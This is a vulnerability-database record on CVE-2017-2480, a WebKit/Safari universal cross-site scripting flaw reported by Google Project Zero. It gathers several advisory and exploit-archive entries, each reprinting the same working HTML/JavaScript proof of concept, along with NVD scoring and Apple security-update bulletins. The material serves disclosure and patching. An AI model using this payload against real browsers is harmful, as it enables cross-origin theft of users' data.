{"lastseen": "2017-04-10T01:24:11", "references": [], "description": "", "reporter": "Google Security Research", "published": "2017-04-10T00:00:00", "type": "packetstorm", "title": "WebKit Synchronous Page Load UXSS", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-04-10T01:24:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-2480"]}, {"type": "seebug", "idList": ["SSV:92923"]}, {"type": "exploitdb", "idList": ["EDB-ID:41865"]}, {"type": "zdt", "idList": ["1337DAY-ID-27572"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810983", "OPENVAS:1361412562310810724", "OPENVAS:1361412562310810727"]}, {"type": "apple", "idList": ["APPLE:HT207607", "APPLE:HT207617", "APPLE:HT207601", "APPLE:HT207600", "APPLE:HT207599"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI10_1.NASL", "ITUNES_12_6.NASL", "ITUNES_12_6_BANNER.NASL"]}], "modified": "2017-04-10T01:24:11", "rev": 2}, "vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2480"], "modified": "2017-04-10T00:00:00", "id": "PACKETSTORM:141980", "href": "https://packetstormsecurity.com/files/141980/WebKit-Synchronous-Page-Load-UXSS.html", "viewCount": 338, "sourceData": "` WebKit: UXSS via a synchronous page load



CVE-2017-2480





Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.



bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)

{

// Support for <frame src=\"javascript:string\">

URL scriptURL;

URL url;

if (protocolIsJavaScript(urlString)) {

scriptURL = completeURL(urlString); // completeURL() encodes the URL.

url = blankURL();

} else

url = completeURL(urlString);



if (shouldConvertInvalidURLsToBlank() && !url.isValid())

url = blankURL();



Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.

if (!frame)

return false;



if (!scriptURL.isEmpty())

frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom



return true;

}



A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.



Tested on Safari 10.0.3(12602.4.8).



PoC:

<body>

<p>click anywhere</p>

<script>



window.onclick = () => {

window.onclick = null;



f = document.createElement('iframe');

f.src = 'javascript:alert(location)';

f.onload = () => {

f.onload = null;



let a = f.contentDocument.createElement('a');

a.href = '<a href=\"https://abc.xyz/';\" title=\"\" class=\"\" rel=\"nofollow\">https://abc.xyz/';</a>

a.click();



window.showModalDialog(URL.createObjectURL(new Blob([`

<script>

let it = setInterval(() => {

try {

opener[0].document.x;

} catch (e) {

clearInterval(it);



window.close();

}

}, 100);

</scrip` + 't>'], {type: 'text/html'})));

};



document.body.appendChild(f);

};



cached.src = kUrl;



</script>

</body>





This bug is subject to a 90 day disclosure deadline. If 90 days elapse

without a broadly available patch, then the bug report will automatically

become visible to the public.









Found by: lokihardt



`

", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 4.3}, "sourceHref": "https://packetstormsecurity.com/files/download/141980/GS20170410000401.txt"}

{"cve": [{"lastseen": "2019-05-29T18:16:58", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "title": "CVE-2017-2480", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2480"], "modified": "2017-08-16T01:29:00", "cpe": [], "id": "CVE-2017-2480", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "seebug": [{"lastseen": "2017-11-19T12:00:00", "description": "Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.\r

```\r

bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)\r

{\r

// Support for <frame src=\"javascript:string\">\r

URL scriptURL;\r

URL url;\r

if (protocolIsJavaScript(urlString)) {\r

scriptURL = completeURL(urlString); // completeURL() encodes the URL.\r

url = blankURL();\r

} else\r

url = completeURL(urlString);\r

\r

if (shouldConvertInvalidURLsToBlank() && !url.isValid())\r

url = blankURL();\r

\r

Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.\r

if (!frame)\r

return false;\r

\r

if (!scriptURL.isEmpty())\r

frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom\r

\r

return true;\r

}\r

```\r

\r

A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.\r

\r

Tested on Safari 10.0.3(12602.4.8).\r

\r

PoC:\r

```\r

<body>\r

<p>click anywhere</p>\r

<script>\r

\r

window.onclick = () => {\r

window.onclick = null;\r

\r

f = document.createElement('iframe');\r

f.src = 'javascript:alert(location)';\r

f.onload = () => {\r

f.onload = null;\r

\r

let a = f.contentDocument.createElement('a');\r

a.href = 'https://abc.xyz/';\r

a.click();\r

\r

window.showModalDialog(URL.createObjectURL(new Blob([`\r

<script>\r

let it = setInterval(() => {\r

try {\r

opener[0].document.x;\r

} catch (e) {\r

clearInterval(it);\r

\r

window.close();\r

}\r

}, 100);\r

</scrip` + 't>'], {type: 'text/html'})));\r

};\r

\r

document.body.appendChild(f);\r

};\r

\r

cached.src = kUrl;\r

\r

</script>\r

</body>\r

```", "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: UXSS via a synchronous page load\uff08CVE-2017-2480\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2480"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92923", "id": "SSV:92923", "sourceData": "

<body>\r

<p>click anywhere</p>\r

<script>\r

\r

window.onclick = () => {\r

window.onclick = null;\r

\r

f = document.createElement('iframe');\r

f.src = 'javascript:alert(location)';\r

f.onload = () => {\r

f.onload = null;\r

\r

let a = f.contentDocument.createElement('a');\r

a.href = 'https://abc.xyz/';\r

a.click();\r

\r

window.showModalDialog(URL.createObjectURL(new Blob([`\r

<script>\r

let it = setInterval(() => {\r

try {\r

opener[0].document.x;\r

} catch (e) {\r

clearInterval(it);\r

\r

window.close();\r

}\r

}, 100);\r

</scrip` + 't>'], {type: 'text/html'})));\r

};\r

\r

document.body.appendChild(f);\r

};\r

\r

cached.src = kUrl;\r

\r

</script>\r

</body>

", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92923", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-14T03:47:18", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2017-04-12T00:00:00", "type": "zdt", "title": "Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting Expl", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2480"], "modified": "2017-04-12T00:00:00", "href": "https://0day.today/exploit/description/27572", "id": "1337DAY-ID-27572", "sourceData": "<!--\r

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1121\r

\r

Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.\r

\r

bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)\r

{\r

// Support for <frame src=\"javascript:string\">\r

URL scriptURL;\r

URL url;\r

if (protocolIsJavaScript(urlString)) {\r

scriptURL = completeURL(urlString); // completeURL() encodes the URL.\r

url = blankURL();\r

} else\r

url = completeURL(urlString);\r

\r

if (shouldConvertInvalidURLsToBlank() && !url.isValid())\r

url = blankURL();\r

\r

Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.\r

if (!frame)\r

return false;\r

\r

if (!scriptURL.isEmpty())\r

frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom\r

\r

return true;\r

}\r

\r

A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.\r

\r

Tested on Safari 10.0.3(12602.4.8).\r

\r

PoC:\r

-->\r

\r

<body>\r

<p>click anywhere</p>\r

<script>\r

\r

window.onclick = () => {\r

window.onclick = null;\r

\r

f = document.createElement('iframe');\r

f.src = 'javascript:alert(location)';\r

f.onload = () => {\r

f.onload = null;\r

\r

let a = f.contentDocument.createElement('a');\r

a.href = 'https://abc.xyz/';\r

a.click();\r

\r

window.showModalDialog(URL.createObjectURL(new Blob([`\r

<script>\r

let it = setInterval(() => {\r

try {\r

opener[0].document.x;\r

} catch (e) {\r

clearInterval(it);\r

\r

window.close();\r

}\r

}, 100);\r

</scrip` + 't>'], {type: 'text/html'})));\r

};\r

\r

document.body.appendChild(f);\r

};\r

\r

cached.src = kUrl;\r

\r

</script>\r

</body>



# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/27572", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-04-11T21:17:51", "description": "Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting. CVE-2017-2480. Webapps exploit for Multiple platform. Tags: ...", "published": "2017-04-11T00:00:00", "type": "exploitdb", "title": "Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2480"], "modified": "2017-04-11T00:00:00", "id": "EDB-ID:41865", "href": "https://www.exploit-db.com/exploits/41865/", "sourceData": "<!--\r

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1121\r

\r

Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.\r

\r

bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)\r

{\r

// Support for <frame src=\"javascript:string\">\r

URL scriptURL;\r

URL url;\r

if (protocolIsJavaScript(urlString)) {\r

scriptURL = completeURL(urlString); // completeURL() encodes the URL.\r

url = blankURL();\r

} else\r

url = completeURL(urlString);\r

\r

if (shouldConvertInvalidURLsToBlank() && !url.isValid())\r

url = blankURL();\r

\r

Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.\r

if (!frame)\r

return false;\r

\r

if (!scriptURL.isEmpty())\r

frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom\r

\r

return true;\r

}\r

\r

A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.\r

\r

Tested on Safari 10.0.3(12602.4.8).\r

\r

PoC:\r

-->\r

\r

<body>\r

<p>click anywhere</p>\r

<script>\r

\r

window.onclick = () => {\r

window.onclick = null;\r

\r

f = document.createElement('iframe');\r

f.src = 'javascript:alert(location)';\r

f.onload = () => {\r

f.onload = null;\r

\r

let a = f.contentDocument.createElement('a');\r

a.href = 'https://abc.xyz/';\r

a.click();\r

\r

window.showModalDialog(URL.createObjectURL(new Blob([`\r

<script>\r

let it = setInterval(() => {\r

try {\r

opener[0].document.x;\r

} catch (e) {\r

clearInterval(it);\r

\r

window.close();\r

}\r

}, 100);\r

</scrip` + 't>'], {type: 'text/html'})));\r

};\r

\r

document.body.appendChild(f);\r

};\r

\r

cached.src = kUrl;\r

\r

</script>\r

</body>\r

", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41865/"}], "apple": [{"lastseen": "2020-05-07T18:05:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "description": "## About Apple security updates



For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.



For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).



Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## iCloud for Windows 6.2



Released March 28, 2017



**APNs Server**



Available for: Windows 7 and later



Impact: An attacker in a privileged network position can track a user's activity



Description: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.



CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)



**libxslt**



Available for: Windows 7 and later



Impact: Multiple vulnerabilities in libxslt



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-5029: Holger Fuhrmannek



**WebKit**



Available for: Windows 7 and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



**WebKit**



Available for: Windows 7 and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2479: lokihardt of Google Project Zero



CVE-2017-2480: lokihardt of Google Project Zero



CVE-2017-2493: lokihardt of Google Project Zero



Entry updated April 24, 2017

", "edition": 1, "modified": "2017-04-24T06:47:37", "published": "2017-04-24T06:47:37", "id": "APPLE:HT207607", "href": "https://support.apple.com/kb/HT207607", "title": "About the security content of iCloud for Windows 6.2 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T18:05:15", "bulletinFamily": "software", "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2017-2493", "CVE-2013-7443", "CVE-2017-2383"], "description": "## About Apple security updates



For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.



For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).



Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## iTunes 12.6 for Windows



Released March 21, 2017



**APNs Server**



Available for: Windows 7 and later



Impact: An attacker in a privileged network position can track a user's activity



Description: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.



CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)



Entry added March 28, 2017



**iTunes**



Available for: Windows 7 and later



Impact: Multiple issues in SQLite



Description: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2.



CVE-2013-7443



CVE-2015-3414



CVE-2015-3415



CVE-2015-3416



CVE-2015-3717



CVE-2015-6607



CVE-2016-6153



**iTunes**



Available for: Windows 7 and later



Impact: Multiple issues in expat



Description: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0.



CVE-2009-3270



CVE-2009-3560



CVE-2009-3720



CVE-2012-1147



CVE-2012-1148



CVE-2012-6702



CVE-2015-1283



CVE-2016-0718



CVE-2016-4472



CVE-2016-5300



**libxslt**



Available for: Windows 7 and later



Impact: Multiple vulnerabilities in libxslt



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-5029: Holger Fuhrmannek



Entry added March 28, 2017



**WebKit**



Available for: Windows 7 and later



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



Entry added March 28, 2017



**WebKit**



Available for: Windows 7 and later



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2479: lokihardt of Google Project Zero



CVE-2017-2480: lokihardt of Google Project Zero



CVE-2017-2493: lokihardt of Google Project Zero



Entry updated April 24, 2017

", "edition": 1, "modified": "2017-12-11T11:38:44", "published": "2017-12-11T11:38:44", "id": "APPLE:HT207599", "href": "https://support.apple.com/kb/HT207599", "title": "About the security content of iTunes 12.6 for Windows - Apple Support", "type": "apple", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-05-07T18:08:44", "bulletinFamily": "software", "cvelist": ["CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2395", "CVE-2017-2444", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "description": "## About Apple security updates



For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.



For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).



Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.



![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)



## Safari 10.1



Released March 27, 2017



**CoreGraphics**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2444: Mei Wang of 360 GearTeam



**JavaScriptCore**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2491: Apple



Entry added May 2, 2017



**JavaScriptCore**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing a maliciously crafted web page may lead to universal cross site scripting



Description: A prototype issue was addressed through improved logic.



CVE-2017-2492: lokihardt of Google Project Zero



Entry updated April 24, 2017



**Safari**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Visiting a malicious website may lead to address bar spoofing



Description: A state management issue was addressed by disabling text input until the destination page loads.



CVE-2017-2376: an anonymous researcher, Chris Hlady of Google Inc, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com), Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Michal Zalewski of Google Inc, an anonymous researcher



**Safari**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites



Description: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.



CVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC



**Safari**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Visiting a malicious website by clicking a link may lead to user interface spoofing



Description: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.



CVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)



**Safari Login AutoFill**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: A local user may be able to access locked keychain items



Description: A keychain handling issue was addressed through improved keychain item management.



CVE-2017-2385: Simon Woodside of MedStack



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution



Description: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.



CVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A prototype access issue was addressed through improved exception handling.



CVE-2017-2386: Andr\u00e9 Bargull



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved input validation.



CVE-2017-2394: Apple



CVE-2017-2396: Apple



CVE-2016-9642: Gustavo Grieco



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2395: Apple



CVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative



CVE-2017-2455: Ivan Fratric of Google Project Zero



CVE-2017-2459: Ivan Fratric of Google Project Zero



CVE-2017-2460: Ivan Fratric of Google Project Zero



CVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero



CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab



CVE-2017-2466: Ivan Fratric of Google Project Zero



CVE-2017-2468: lokihardt of Google Project Zero



CVE-2017-2469: lokihardt of Google Project Zero



CVE-2017-2470: lokihardt of Google Project Zero



CVE-2017-2476: Ivan Fratric of Google Project Zero



CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative



Entry updated June 20, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A type confusion issue was addressed through improved memory handling.



CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy



Description: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.



CVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to high memory consumption



Description: An uncontrolled resource consumption issue was addressed through improved regex processing.



CVE-2016-9643: Gustavo Grieco



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may result in the disclosure of process memory



Description: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.



CVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A memory corruption issue was addressed through improved input validation.



CVE-2017-2433: Apple



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2364: lokihardt of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: A malicious website may exfiltrate data cross-origin



Description: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.



CVE-2017-2367: lokihardt of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.



CVE-2017-2445: lokihardt of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.



CVE-2017-2446: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Visiting a maliciously crafted website may compromise user information



Description: A memory corruption issue was addressed through improved memory handling.



CVE-2017-2447: Natalie Silvanovich of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: Multiple memory corruption issues were addressed through improved memory handling.



CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative



Entry added March 28, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to arbitrary code execution



Description: A use after free issue was addressed through improved memory management.



CVE-2017-2471: Ivan Fratric of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may lead to universal cross site scripting



Description: A logic issue existed in frame handling. This issue was addressed through improved state management.



CVE-2017-2475: lokihardt of Google Project Zero



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2479: lokihardt of Google Project Zero



Entry added March 28, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Processing maliciously crafted web content may exfiltrate data cross-origin



Description: A validation issue existed in element handling. This issue was addressed through improved validation.



CVE-2017-2480: lokihardt of Google Project Zero



CVE-2017-2493: lokihardt of Google Project Zero



Entry updated April 24, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: Visiting a malicious website may lead to address bar spoofing



Description: An inconsistent user interface issue was addressed through improved state management.



CVE-2017-2486: an anonymous researcher



Entry added March 30, 2017



**WebKit**



Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4



Impact: An application may be able to execute arbitrary code



Description: A memory corruption issue was addressed through improved memory handling.



